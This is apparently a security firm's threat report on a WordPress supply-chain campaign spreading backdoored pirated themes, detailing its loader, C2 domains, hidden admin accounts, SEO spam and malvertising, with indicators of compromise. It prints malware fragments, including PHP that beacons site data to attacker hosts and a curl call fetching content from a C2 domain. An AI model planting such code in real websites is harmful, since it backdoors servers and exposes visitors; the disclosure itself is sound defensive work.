PHP’s Labyrinth - Weaponized WordPress Themes & Plugins

Authors:Danny Adamitis and Matt Thompson

Overview

Prevailion’s Tailored Intelligence team has followed an active supply chain attack that has been ongoing since late 2017, we named this campaign “PHPs Labyrinth.” In this operation, threat actors have been able to surreptitiously install malicious files into a large number of Premium WordPress Themes and Plugins. We assess that the responsible party chose to target WordPress as it makes up 60% of all Content Management systems, and 34% of all websites on the internet. WordPress themes and plugins allow the average person to quickly and easily create a website through “drag and drop” features, rather than coding an entire website themselves.

The nefarious actor took advantage of an increased demand for premium themes, and managed to distribute them to various end-users through the use of specific WordPress marketplace platforms. These marketplace platforms were created by the threat actor; we were able to discover 30 different platforms used to distribute the trojanized themes and plugins. Three of the most popular webpages on these platforms were;

●      “Ultimate Support Chat” with approximately 700k views

●      “Woocomerence Product filter” with approximately 175k views and

●      “Slider Revolution v5.4.8.1” with approximately 125k views.

Thus far Prevailion has been able to identify over 20k actively compromised web servers worldwide, that are displaying evidence of compromise. This data is currently available on the Prevailion Apex platform. Based upon the number of views from the malicious platforms, we speculate that the total number of infected webservers is likely much higher, potentially in the hundreds of thousands. Due to the pandemic nature of this threat, Prevailion coordinated their efforts with appropriate U.S law enforcement on this campaign.

The attack commences when an unsuspecting victim uploads a trojanized theme to their web server. References to those trojanized files date back to stack overflow posts from October 2017. Once all the malicious files are downloaded, the threat actor gained full control over the web server - allowing them to add an administrative account, recover the web admin’s email account and WordPress password hash. If the password was recovered, from the hash and was used for multiple accounts, it could allow access to corporate resources.

In most cases we assess that the web servers ultimately became part of the Propeller Ads advertising network. Additional research shows that the Propeller Ads network has been associated with a plethora of malicious activity from different threat actors, including but not limited to malvertising and the Fallout exploit kit. This ad network is manipulated by attackers to become the contagion vector, allowing threat actors to remotely post malicious ads on otherwise benign websites. The malicious ads run javascript files, and surreptitiously install malware on victimized machines. If successful, this technique could allow the threat actor to steal usernames, passwords, and private files from victims' computers.

WordPress Malware

PHP’s Labyrinth Campaign Walk Through

Infection source

The Prevailion team has been able to identify 30 platforms that served trojanized WordPress Themes. The most prominent websites appeared to be called Vestathemes.com. The website description states that they offer “Thousands of free nulled, [a.k.a. pirated] WordPress Themes and Plugins.” When analyzing this cluster of WordPress platforms we observed a number of irregularities that make us believe they were fictitious, and managed by the same entity. For instance, sites had broken links to social media icons that took the visitor right back to the homepage, furthermore all the suspicious websites appeared to use the same template. 

Screenshot of Vestatheme.com and null5.top website

To supplement this claim; in at least one instance the threat actor created domain, null24[.]icu, displayed the page header saying, Nulledzip[.]download, which is one of the other websites. That domain, nulledzip[.]download, was also flagged in a Digital Millennium Copyright Act takedown notice that can be found here.

Based off our analysis we have identified the following 30 websites that correlate to this cluster;

●      Null5[.]top,

●      Freedownload[.]network,

●      Downloadfreethemes[.]io,

●      Themesfreedownload[.]net,

●      Downloadfreethemes[.]co,

●      Downloadfreethemes[.]pw,

●      Wpfreedownload[.]press,

●      Freenulled[.]top,

●      Nulledzip[.]download,

●      Download-freethemes[.]download,

●      Wpmania[.]download,

●      Themesdad[.]com,

●      Downloadfreethemes[.]download,

●      Downloadfreethemes[.]space,

●      Download-freethemes[.]download,

●      Themesfreedownload[.]top,

●      Wpmania[.]download,

●      Premiumfreethemes[.]top,

●      Downloadfreethemes[.]space,

●      Downloadfreethemes[.]cc,

●      Freethemes[.]space,

●      Premiumfreethemes[.]top,

●      Downloadfreenulled[.]download,

●      Downloadfreethemes[.]download,

●      Freethemes[.]space,

●      Dlword[.]press,

●      Downloadnulled[.]pw,

●      24x7themes[.]top,

●      null24[.]icu

Loader

The “class.theme-module.php” or “class.plugin-modules.php” file is the operative file that was added to the all the trojanized themes. The threat actor added functionality that allows for the command and control node to be changed to a “newdomain” periodically. The next function obtains a “$wp_auth_key” from one of the 1st stage C2s. Afterward it then writes the contents of the 1st stage C2 with the URL of code.php to a file called “wp-tmp.php”. The malware would perform host based reconnaissance and attempts to enumerate the following directories:

upload	cli	media	template
uploads	components	modules	Images
img	includes	plugins	Css
administrator	language	tmp	js
admin	layouts	upgrade	image
Bin	libraries	engine	file
cache	logs	templates	files
wp-admin	wp-content	wp-includes

Next it checks to see if certain files exist; such as post.php, wp-vcd.php, if not it creates them on the system. It then copies the “WP_CD_Code” function to “wp-vcd.php”. This is the file that seems to have drawn the most attention over the past few years, and has been mentioned on WordPress web forums. The wp-vcd.php file copied the malicious code from the file “class.theme-modules.php” that was previously discussed.

Then it scans for a file named functions, if that file exists it will run “file get contents” on the 1st stage C2, HTTP_HOST, Password and Install hash.

One such command GET request would look like this

http://www.trilns.com/o.php?host=www.compromiseddomain.com&password={MD5hash} 

Previously employed code will then repeat the process and iterate over two other domains with different generic Top-Level domains (gTLDs). We suspect that these domains serve as backup communications channels in case an issue arose with the primary domain. An example of the three URLs used in the December campaign were:

●      hxxp://www.vrilns[.]com/code[.]php

●      hxxp://www.vrilns[.]pw/code[.]php

●      hxxp://www.vrilns[.]top/code[.]php

Once the code creates the new wp-vcd.php file, it then deletes the file class.theme-module.php.

In this section we’ll examine the three files that were previously made by the loader script. Note that some of the files will be discussed throughout the report, in this section we show the files as they appear after the loader module was run once.

Newly Observed Shift in Tactics

We observed the threat actor altering their tactics, techniques and procedures (TTPs), starting in late December 2019 after a report detailing aspects of this activity was reported by another security firm. The most recent threat actor domain registered was frilns[.]com which used Alidns, Alibaba Cloud DNS, instead of CloudFare. The threat actor also no longer relied upon CloudFare hosting services and seemingly moved all the domains to a single IP address 94[.]156[.]175[.]170. One more change is that the threat actor removed the secondary and tertiary communications channels during the December to January 2020 timeframe. 

1st Stage

At this point we see the threat actor taking action from their 1st stage server, adding code to the existing files on the compromised machine. One modified file was functions.php, the threat actor added a line of code to top of this file that would run the wp-vcd.php file. The next file modified was wp-tmp.php, as mentioned above this file contains an WP_AUTH_Key.  It was here that we took note of two additional sections of code.

The first section downloads additional code and adds it to the top of functions.php from a 1st stage C2. An example of this:

$file=file_get_contents(get_template_directory().'/functions.php'); $filec=file_get_contents(get_stylesheet_directory().'/functions.php'); $rep="pacocs.top"; $repw="pacocs.xyz"; if (stripos($file,$rep) !== false) { $new_file=str_replace($rep,$repw,$file); @file_put_contents(get_template_directory().'/functions.php',$new_file); } if (stripos($filec,$rep) !== false) { $new_filec=str_replace($rep,$repw,$filec);

The second section of code adds a persistent cookie called “wordpress_cf_adm_use_adm” to anyone who visits the website - however the cookie would only be added to users who came to the website from one of the following search engines:

●      Google,

●      Yahoo,

●      Yandex,

●      MSN,

●      Baidu,

●      Bing

●      DoubleClick.

The cookie includes the referring search engine, as well as a reference to the compromised domain that was visited, and is set to persist for 1000 days. Once the cookie was attached to the end-user, their IP address is added to a list that lives in the file called “wp-feed.php.” The code used by the threat actor appears to slightly modify code that was found on another WordPress forum, that talked about how to target visitors of your site from search engines.

New Administrative Account

In order to ensure continued access to the infected websites, they also added an administrative account. This account allows them to simply log back into the website (with administrative privileges) at any time to alter any files. There was one variant of this malware reported by Astra, where the threat actor would create the username “wpadmin”. More recent reporting from Medium indicated that the threat actor kept this feature but  switched to utilizing a different username of “100010010”.

2nd Stage

Functions.php

We came back to the functions.php file to analyze the new code added during the last step. The new segment of code sets the max upload and post size to 128 Megabytes. It also specified that if the code took longer than 600 seconds to execute, it should stop. We hypothesize that these features were added to ensure their activity was not detected, as a hung process would be more likely to cause problems and be investigated by a responder.

            @ini_set( 'upload_max_size' , '128M' );

@ini_set( 'post_max_size', '128M');

@ini_set( 'max_execution_time', '600' );

Next it will obtain the IP address, bot number, pack and user-agent string of the compromised machine and send them to a threat actor controlled C2.

$result=get_url(implode("",$hoho)."/logs/dolodos.php?url=".urlencode("http://".$server_host.$_SERVER["REQUEST_URI"])."&ref=".urlencode(@$_SERVER["HTTP_REFERER"])."&ip=".checked_ip()."&bot=$bot_num&pck=$pck&uagent=".urlencode($_SERVER["HTTP_USER_AGENT"])); hxxp://dolodos[.]top

system("chmod 755 $red_domain_path;curl -s http://piasuna[.]gdn/gen/actual_domain_my.php?pck=$pck | base64 > $red_domain_path");

After identifying the URL pattern we were able to find another live C2 domain through Google, vosmas[.]icu/gen/actual_domain_my.php?pck=ip8.

Google Search for the URL path found in the deobfuscated functions.php file

Through our efforts we were able to identify the following domains:

●      vosmas[.]icu                                                               

●      tdreg[.]icu

●      tdreg[.]top

●      medsource[.]top

●      tretas[.]top

●      piastas[.]gdn

●      pervas[.]top

●      vtoras[.]top

●      dolodos[.]top

●      piasuna[.]gdn

●      semasa[.]icu

●      vosmas[.]icu

●      devata[.]icu

One notable aspect - some of these domains such as medsource[.]top simply contain instructions that redirect the output to tdreg[.]icu. So we suspect that some of the domains may act as relays for the tdreg[.]icu domain

Below this code there was another copy of the “WP_CD_Code” code that was referenced in the loader section of this report. We believe the threat actor copied this code to numerous files as a secondary means of persistence, in the event that one file is deleted by the systems administrator they retain access to the compromised wordpress domain. 

Wp-tmp.php - Search Engine Optimization (SEO) component

This group calculated all the angles when it came to manipulating searches - another calculated effort was to raise the Search Engine Optimization (SEO) profile of the sites they controlled, creating a cost-effective means to draw more “clicks” and use that as a cost effect leverage to proliferate. To accomplish this, they run a series of commands on the compromised websites in order to enumerate the individual site. This included three functions for commands:

●      case 'get_all_links'

●      ‘set_id_links'

●      case 'create_page'

The first command obtains a list of the posts on a compromised wordpress site. The second command allows the attacker to add web links to existing web pages. The third command enables them to create new web pages on the compromised domain. In one file, the threat actor added links to one of the newly-controlled market places, offering their premium nulled themes. This was likely done to raise the SEO of these websites, ensuring they get more downloads and ultimately, more infections. 

The functionality in this section appeared to closely mirror code found on another stack-overflow post, where the incident responder claimed to find the snippet saved in the file “post.php.” This is where the attackers can also add “keywords” to make the website more popular, likely in an attempt to raise the websites profile so it could display more ads. As noted by other researchers, in previous reporting this aspect of the campaign utilized the domain *.spekt[.]pw. The advertising component will be explained in the section below.

Ad-Blocker Script

In more recent versions of wp-tmp.php, there was a PHP script that would serve as an Anti- AdBlocker and was used through at least September 2019. This allows the website to display ads on the visited webpage, even if the end-user was using a program such as “Ad-Blocker”. Based upon lexicon analysis of the code found in the sample, the script appeared to be a slightly modified version of PHP code found on this web forum post from 2017.

Javascript - Advertising network

After the Ad-Blocker code, there is a line for a function called “slider_option” used to make asynchronous requests to two JavaScript files hosted on remote servers. These hostnames correspond to the advertising service Propeller Ads. Propellers Ads is an online ad service where various end users can bid to have their ads displayed on an otherwise begin website. While this has become a standard marketing technique, unfortunately it can also be abused by threat actors with more nefarious intentions. In order to ensure the correct person receives the advertisement revenue for displaying the ads, the accounts are identified by their zoneid.  

A copy of the javascript used to invoke the ads is displayed below:

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1"></script>

<script src="//defpush.com/ntfc.php?p=1565632" data-cfasync="false" async></script>';

Propeller Ad Network

Generating Money through Advertisements 

Once the WordPress website was compromised, the threat actor appeared to be interested in generating revenue through the Propeller Ads network. While the propeller ad network presents itself like any other ad network, they have had a history of being used by criminal organizations for malicious purposes. Their extensive run history with various computer security firms resulted in an article being written about these activities by TechTarget in 2017.

Malvertising

Malvertising is when threat actors are able to display malicious ads, and run remote javascript files on otherwise benign websites. Cisco wrote a comprehensive report on advertising and malvertising last year that explains the marketing aspects of how paid advertising works. For those that are unfamiliar the client could chose a plan and would pay:

●      Every time the advertisement is shown (pay per impression)

●      Every time the advertisement is clicked (pay per click)

●      Every time the advertisement is shown, clicked, and something is ordered from the website (pay per order)

During the course of our investigation we visited a compromised domain and got the following URL. We have removed the domain and cep string from the URL to avoid identifying the victim.

https://{compromised-Domain}/testomaster-br.php?cep={string}&widget_id=5633835s733669&teaser_id=2497610&click_id=49d0d459e09b42d26f378dea3140b06f&category_id=145&campaign_id=480469&click_price=0.005

From this example, we determined that the threat actor was receiving half a cent every time someone would click on the advertisement. In numerous cases, the advertisements were completely benign and would direct the end user to a legitimate service or website. In other cases however, we observed pop-up ads prompting the user to download potentially unwanted programs (PUP) or sometimes called Adware. These redirections could occur from a user clicking on a box to “allow notifications” or in some cases just clicking URLs embedded within the website. In one instance, we clicked on the “about us” link and received a pop up like the one below. 

“Flash Player Update” Malvertising for Windows 10 machines from uniqueapps[.]app

In other cases the advertisements don't look like advertisements at all, and mimic “Software Updates”.

“Software Update” Malvertising for OSX machines from tharbadir[.]com

If an end user clicks on the pop-up advertisement, it could install the potentially unwanted program on their local machine. Once on the local machine, these programs can continue to redirect the victim’s web browser to certain websites or even download additional malware from the internet.

Fallout Exploit Kit

The Nao Security’s twitter account, stated that they observed propeller ads redirect victims to domains associated with the Fallout Exploit Kit.

            Image was created by Nao’s Security and posted on twitter - showing propellerads.php redirecting to an exploit kit

In addition to the screenshot above, other security firms such as FireEye have previously noted the Fallout Exploit Kit being propagated to victims through advertising networks. They noted that the victim would likely be served either a malvertising pop up, similar to those in the previous section, or connected to the exploit kit based upon the browser profile from the user-agent string and potentially the location of the victim. If the browser was successfully exploited by the kit, Viriback noted that it appeared to drop a variant of Zloader. The zloader agent has historically been used to further download additional payloads.

Compromise Intelligence Details

Once Prevailion was able to identify the command and control nodes associated with this particular campaign, we collected the associated telemetry information. We then cleaned the data using proprietary algorithms, thereby reducing bias and the rate of false positives. This refined data is called Evidence of Compromise (EoC), which allows us to create a global contagion snapshot representing a portion of impacted organizations. The map below denotes organizations that present EoC associated with PHP’s Labyrinth compromised web servers.

Prevailion Global Contagion Snapshot of EoC.

Based upon our telemetry, affected organizations are spread across a multitude of countries and sectors. As is typical with supply chain attacks, there was no clear targeting of any one individual sector, and so the resulting contagion map shows victimology that reflects largely upon the popularity of WordPress. Based upon our findings, we identified that small to medium sized businesses accounted for more than a fifth of all compromised entities, as they are the primary customers of premium third-party themes. This is most likely due to the fact that many lack the necessary funding or human capital to build a completely custom website, unlike larger, more established firms.

Additionally, we identified a number of more prominent victims, including but not limited to:

●      A decentralized crypto-mining website

●      A U.S. based stock trading firm

●      A small U.S. based bank

●      A government run petro/chemical organization

●      A U.S. based insurance company

●      A large U.S. based manufacturer

●      A U.S. payment card solution organization

●      A U.S. based IT services organization

While compromises of smaller third parties may first appear a nuisance, these instances can actually become quite dangerous later on down the road. Larger organizations typically have more money to invest in their cyber defense programs, so it becomes much easier to launch a campaign through a supply chain vendor, than it would be to directly attempt to infect a larger corporation. If left undetected, threat actors can use these initial infections to pivot, and affect larger organizations through their smaller, less defended third parties.

Mitigations

In order to protect against the WordPress malware, we recommend against using any pirated, a.k.a nulled, software. Organizations should instead utilize either open-source software or pay for premium themes. If your organization’s web server is running windows based operating systems, we recommend enabling and updating Windows Defender.

The default WordPress passwords are stored in their current state as a hybrid of MD5 hashes and PHP Pass, which are proven vulnerable to collision attacks. Through recovery of the username and MD5 hash, an attacker could find a collision offline to facilitate access to the organization's corporate network. This emphasizes the problem of password reuse, which has plagued the industry. When configuring any WordPress website, we encourage web administrators to use more secure hashing algorithms, and to never reuse passwords across multiple accounts.   

In order to curtail this threat posed to end-users from people visiting these compromised websites, we recommend using a plugin like NoScript that prevents remote javascript from running on your machine. We also recommend updating to the latest operating systems and web browser. This could help protect against certain exploit kits, which are known to target outdated web browsers. If you click on a malvertising ad, we recommend scanning your computer with an up-to-date version of antivirus to minimize the impact of the threat.

Conclusion

While the problem of compromised websites is not new, it will continue to plague end users, administrators, and the internet as a whole. As WordPress becomes even more prominent, it is an evermore appealing target for attackers. To make matters worse, all end-users need to do is download one malicious theme or even one plugin to compromise the integrity of the entire web server. In one instance we have observed a verified Themeforest purchaser ask questions on support forums about the malicious files and even included references to one of the command and control domains. We then downloaded that same theme but did not see any malicious files and suspect the end user likely downloaded an plugin from a malicious platform in conjugation with the themeforest theme. 

At this time, the threat actor seems content with generating revenue off the advertising aspect of this campaign; however we cannot ignore the fact that in its present state, it has metastasized into a massive botnet, with all the potential issues that represents. This could also have far reaching impact as it gives other criminals a platform to perform malvertising and use various exploit kits to amplify their reach. We assess that exposing and countering this activity we are able impact, this activity and, other criminals we use these compromised sites as a platform to exploit various end-users having a ripple effect making everyone safer.

We believe that this campaign was able to occur for so long due to the placement of these web servers. Similar to the VPNFitler malware, these web servers are typically located outside of the companies standard perimeter. Many of these web servers are running without anti-virus software and are rarely checked except for when they go offline. This unique combination makes them an ideal target for attackers and we expect to see continued target of Web server and WordPress related software to remain a serious threat to network defenders.                     

Indicators of Compromise

1st stage domains

frilns[.]com

crilns[.]com

brilns[.]com

trilns[.]com

1st stage IP address

94[.]156[.]175[.]170

2nd stage domains

vosmas[.]icu

tdreg[.]icu

tdreg[.]top

medsource[.]top

tretas[.]top

piastas[.]gdn

pervas[.]top

vtoras[.]top

dolodos[.]top

piasuna[.]gdn

semasa[.]icu

vosmas[.]icu

devata[.]icu

FileName:class.theme-modules.php

590543e78b9526c6003ea09559983fb8b6788bf729a7ef699a8528df1ee515fc

bb4a9352f5ec15a2fef209fd30502f3f563348d245ee3e53b1defeddc61bd176

a3b97f264d1bdabc21eb7ee504f16f7afe563a83b0f0dbcaefb1fb45d7962867

A1606a7033b77185d40444ccb6571fb9c792235f69872e1d3f6c0556b84849a4

4bf619c5931a70946bad5f4f7e9954eef8820053f4e97feccb1a009ac57fde2c 

C7d60c6a28cac56b9dd2661e943da5f623d1e9da6e6f5a3cffbc7a1edb4a025f

70de1fa188414ebcf442ccdefc6873b18cb9f7e801f4af763ca057a03cd92ace

1st stage samples: 

C61f828482ca269cb76decc9b53db277057caae66b426c3b2b2473d5367c0185

dc0aafc523e5942ec8e9c6f7db172551d4836d8002747b3d9790170d01d6ffa2

385689df54ebbec8715e556d8ab1aecc8a820a32e61d7857618f12ddf5017d77

93bde6244fe499b4eb8cde8c4d79cdd3f0d151f0945ea484f2f18334346776c1

Dc0aafc523e5942ec8e9c6f7db172551d4836d8002747b3d9790170d01d6ffa2

2nd stage samples:

1eb6a47fe5e37f4ca97721ea22a0462f9b9c789af9b861ba3b0c829823101496

Dc82c31bb81040cd4202ec0d332acfb498d5d5fbc8a62ceb1585a686278852a0

62b0e263d65c837f0b36681f342d75328cb86b5b6de91116f47b5a402da4cb23

385689df54ebbec8715e556d8ab1aecc8a820a32e61d7857618f12ddf5017d77

26a3f5e50ebbcbcee43b9cf5679717a2227dcb046d666f709a4884923f6d2582

06fa326bab5330a7484a75f1af019960b1ab354fb6d7c2e8d3d0d7f4193f2f62

0506bc097ab7151caa9b2768b7c21847610c9e1d86aa656e79836b90c42f62f3

Dc82c31bb81040cd4202ec0d332acfb498d5d5fbc8a62ceb1585a686278852a0

7addff39d07857ffd2fee0779959ea3419408407ced75989a9f1e3c67dbe537a

Malvertising

17a74e5611aeb79f8443a985edbd9f44319af063cc8eda8297f207127ae706b8

fab349488ea7d99a24f7bc97f9e216b4e04e3d257cc02f25ad5b2f6629605321

6a88fb15e191eb7dd0f5efd5313c69cd8271658787bc94e618cbf9542d47686d

Zloader

712503faf40a5e21efd4f2c718674c14a83eca0d6ebe41f985a16a9218111a9f

eafbd21a0f9f082fa2e94e010569d7fa8512d978087c2633d652b865b922465a

Domains

kdsidsiadsakfsas[.]com/gate[.]php

oajdasnndkdahm[.]com/gate[.]php